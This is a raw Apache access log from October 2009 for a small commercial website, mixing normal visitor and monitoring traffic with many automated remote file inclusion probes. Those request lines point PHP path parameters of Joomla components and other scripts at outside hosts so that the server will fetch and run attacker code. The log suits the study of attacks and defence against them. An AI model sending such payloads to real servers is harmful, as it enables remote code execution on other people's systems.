212.48.115.189 - - [17/Oct/2009:00:00:00 -0400] "GET /logs/error_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://ownzz.100free.com/idzim.txt?? HTTP/1.1" 404 260 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
212.48.115.189 - - [17/Oct/2009:00:00:00 -0400] "GET /logs/error_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://ownzz.100free.com/idzim.txt?? HTTP/1.1" 404 260 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
201.219.3.163 - - [17/Oct/2009:00:00:07 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:00:07 -0400] "GET /logs/access_log.Q109080900%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:00:10 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:01:17 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
70.189.165.67 - - [17/Oct/2009:00:01:16 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://us.mc521.mail.yahoo.com/mc/welcome?.gx=1&.tm=1255752079&.rand=750mkkefl8j7c" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; yie8)"
201.219.3.163 - - [17/Oct/2009:00:01:19 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:01:19 -0400] "GET /logs/access_log.Q109080900%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:01:54 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:01:54 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:01:54 -0400] "GET /logs/access_log.Q109080900%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:02:00 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:02:00 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:02:00 -0400] "GET /logs/access_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:02:05 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:02:05 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:02:05 -0400] "GET /logs/access_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
166.137.5.171 - - [17/Oct/2009:00:02:07 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko)"
201.219.3.163 - - [17/Oct/2009:00:02:11 -0400] "GET /logs/access_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:02:12 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:02:12 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:02:12 -0400] "GET /logs/access_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
68.114.157.192 - - [17/Oct/2009:00:02:19 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.23) Gecko/20090812 Thunderbird/2.0.0.23"
201.219.3.163 - - [17/Oct/2009:00:02:25 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:02:25 -0400] "GET /logs/access_log.Q109080900%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:02:25 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:02:33 -0400] "GET /phphtml.php?htmlclass_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:02:33 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:02:33 -0400] "GET /logs/phphtml.php?htmlclass_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.43.202.66 - - [17/Oct/2009:00:02:56 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://wubkk.wu.ac.th/image/icon/id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
211.43.202.66 - - [17/Oct/2009:00:02:56 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://wubkk.wu.ac.th/image/icon/id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
201.219.3.163 - - [17/Oct/2009:00:02:56 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:02:56 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:02:56 -0400] "GET /logs/access_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:03:00 -0400] "GET /logs/access_log.Q109080900%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:03:03 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:03:04 -0400] "GET /logs/access_log.Q109052400%20%20/phphtml.php?htmlclass_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:03:11 -0400] "GET /logs/phphtml.php?htmlclass_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:03:11 -0400] "GET /phphtml.php?htmlclass_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:03:11 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:03:20 -0400] "GET /logs/access_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:03:20 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
201.219.3.163 - - [17/Oct/2009:00:03:20 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:00:03:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.219.3.163 - - [17/Oct/2009:00:03:24 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
68.114.157.192 - - [17/Oct/2009:00:04:16 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.23) Gecko/20090812 Thunderbird/2.0.0.23"
68.114.157.192 - - [17/Oct/2009:00:04:18 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 206 44086 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.23) Gecko/20090812 Thunderbird/2.0.0.23"
207.210.84.226 - - [17/Oct/2009:00:04:26 -0400] "GET /logs/access_log.Q109080900%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
65.75.82.45 - - [17/Oct/2009:00:05:16 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://bl105w.blu105.mail.live.com/mail/InboxLight.aspx?FolderID=00000000-0000-0000-0000-000000000001&InboxSortAscending=False&InboxSortBy=Date&n=2120982248" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; msn OptimizedIE8;ENUS)"
122.155.5.84 - - [17/Oct/2009:00:06:17 -0400] "GET ///index.php/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:00:06:17 -0400] "GET /logs///index.php/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:00:06:17 -0400] "GET /logs/access_log.Q109051600%20%20///index.php/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:00:06:17 -0400] "GET ///index.php/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:00:06:17 -0400] "GET /logs/access_log.Q109051600%20%20///index.php/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:00:06:17 -0400] "GET /logs/access_log.Q109090600%20%20///index.php/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:00:06:17 -0400] "GET /logs///index.php/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:00:06:17 -0400] "GET /logs/access_log.Q109090600%20%20///index.php/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:00:06:42 -0400] "GET /logs//include/write.php?dir=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:00:06:42 -0400] "GET //include/write.php?dir=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:00:06:42 -0400] "GET /logs/access_log.Q109072200//include/write.php?dir=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:00:06:42 -0400] "GET /logs/access_log.Q109092000//include/write.php?dir=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:06:42 -0400] "GET /logs/access_log.Q109051100%20%20///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:06:42 -0400] "GET /logs/access_log.Q109073100%20%20///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:06:42 -0400] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:06:42 -0400] "GET ///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
76.20.84.63 - - [17/Oct/2009:00:06:45 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko)"
65.98.17.54 - - [17/Oct/2009:00:06:52 -0400] "GET /logs/access_log.Q109051100%20%20///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:06:52 -0400] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:06:52 -0400] "GET /logs/access_log.Q109073100%20%20///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:06:52 -0400] "GET ///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
85.214.54.192 - - [17/Oct/2009:00:06:52 -0400] "GET /logs/error_log.Q109100300//?path%5Bdocroot%5D=http://www.simulogics.com/public/idxxx.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
85.214.54.192 - - [17/Oct/2009:00:06:52 -0400] "GET //?path%5Bdocroot%5D=http://www.simulogics.com/public/idxxx.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
85.214.54.192 - - [17/Oct/2009:00:06:52 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.simulogics.com/public/idxxx.txt? HTTP/1.1" 200 22193 "-" "libwww-perl/5.803"
211.206.120.162 - - [17/Oct/2009:00:07:06 -0400] "GET /logs//errors.php?error=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:00:07:06 -0400] "GET //errors.php?error=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
85.214.54.192 - - [17/Oct/2009:00:07:23 -0400] "GET /logs/error_log.Q109071300//?path%5Bdocroot%5D=http://www.simulogics.com/public/idxxx.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
193.33.21.28 - - [17/Oct/2009:00:07:33 -0400] "GET /logs/error_log.Q109100300//?path%5Bdocroot%5D=http://www.simulogics.com/public/idxxx.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
67.142.130.29 - - [17/Oct/2009:00:07:33 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
67.142.130.29 - - [17/Oct/2009:00:07:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
193.33.21.28 - - [17/Oct/2009:00:07:33 -0400] "GET //?path%5Bdocroot%5D=http://www.simulogics.com/public/idxxx.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
193.33.21.28 - - [17/Oct/2009:00:07:33 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.simulogics.com/public/idxxx.txt? HTTP/1.1" 200 22193 "-" "libwww-perl/5.805"
67.142.130.29 - - [17/Oct/2009:00:07:33 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
67.142.130.29 - - [17/Oct/2009:00:07:33 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
193.33.21.28 - - [17/Oct/2009:00:08:00 -0400] "GET /logs/error_log.Q109071300//?path%5Bdocroot%5D=http://www.simulogics.com/public/idxxx.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
211.206.120.162 - - [17/Oct/2009:00:08:07 -0400] "GET /logs/access_log.Q109071700//admin/spaw/spaw_control.class.php?spaw_root=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:00:08:07 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:00:08:07 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:00:08:12 -0400] "GET /logs/access_log.Q109100500//admin/spaw/spaw_control.class.php?spaw_root=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:00:08:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.206.120.162 - - [17/Oct/2009:00:11:14 -0400] "GET /logs/access_log.Q109092500%20%20//include/write.php?dir=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:00:11:39 -0400] "GET /logs/access_log.Q109051600///index.php/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:00:11:39 -0400] "GET /logs/access_log.Q109090600///index.php/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
82.151.132.176 - - [17/Oct/2009:00:11:49 -0400] "GET /logs/access_log.Q109091500//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dubnahome.ru//one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:00:11:51 -0400] "GET /logs/access_log.Q109051600///index.php/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:00:11:51 -0400] "GET /logs/access_log.Q109090600///index.php/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
119.63.199.21 - - [17/Oct/2009:00:11:53 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
166.205.131.17 - - [17/Oct/2009:00:11:53 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko)"
211.206.120.162 - - [17/Oct/2009:00:12:30 -0400] "GET /logs/access_log.Q109092000%20%20//include/write.php?dir=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.43.202.66 - - [17/Oct/2009:00:13:00 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://wubkk.wu.ac.th/image/icon/id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
211.43.202.66 - - [17/Oct/2009:00:13:00 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://wubkk.wu.ac.th/image/icon/id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
209.59.12.99 - - [17/Oct/2009:00:13:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.225.246.18 - - [17/Oct/2009:00:13:27 -0400] "GET /logs/access_log.Q109072200%20%20//skin/happycast_category_lightblack/setup.php?dir=http://www.fpappalardo.com/baner.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.225.246.18 - - [17/Oct/2009:00:13:28 -0400] "GET /logs/access_log.Q109080800%20%20//skin/happycast_category_lightblack/setup.php?dir=http://www.fpappalardo.com/baner.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
199.238.165.123 - - [17/Oct/2009:00:13:30 -0400] "GET ///searcharrays.php?addonDir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
199.238.165.123 - - [17/Oct/2009:00:13:30 -0400] "GET /logs///searcharrays.php?addonDir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
68.171.54.5 - - [17/Oct/2009:00:13:30 -0400] "GET /logs///snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://oldtoys.biz/administrator/zfxid1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
68.171.54.5 - - [17/Oct/2009:00:13:30 -0400] "GET /logs/access_log.Q109062500%20%20///snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://oldtoys.biz/administrator/zfxid1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
68.171.54.5 - - [17/Oct/2009:00:13:30 -0400] "GET ///snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://oldtoys.biz/administrator/zfxid1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
199.238.165.123 - - [17/Oct/2009:00:13:30 -0400] "GET /logs/access_log.Q109071900%20%20///searcharrays.php?addonDir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
199.238.165.123 - - [17/Oct/2009:00:13:30 -0400] "GET /logs/access_log.Q109081200%20%20///searcharrays.php?addonDir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
68.171.54.5 - - [17/Oct/2009:00:13:34 -0400] "GET /logs/access_log.Q109062400%20%20///snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://oldtoys.biz/administrator/zfxid1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
199.238.165.123 - - [17/Oct/2009:00:14:17 -0400] "GET /logs/access_log.Q109081200///searcharrays.php?addonDir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
199.238.165.123 - - [17/Oct/2009:00:14:17 -0400] "GET /logs/error_log.Q109080600///searcharrays.php?addonDir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:14:58 -0400] "GET /logs/access_log.Q109051100///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:14:58 -0400] "GET /logs/access_log.Q109073100///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.244.8.170 - - [17/Oct/2009:00:15:13 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko)"
65.98.17.54 - - [17/Oct/2009:00:15:16 -0400] "GET /logs/access_log.Q109051100///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:00:15:16 -0400] "GET /logs/access_log.Q109073100///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
119.63.193.55 - - [17/Oct/2009:00:15:30 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
199.238.165.123 - - [17/Oct/2009:00:16:02 -0400] "GET /logs/access_log.Q109071900///searcharrays.php?addonDir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
68.171.54.5 - - [17/Oct/2009:00:16:33 -0400] "GET /logs/access_log.Q109062500///snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://oldtoys.biz/administrator/zfxid1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
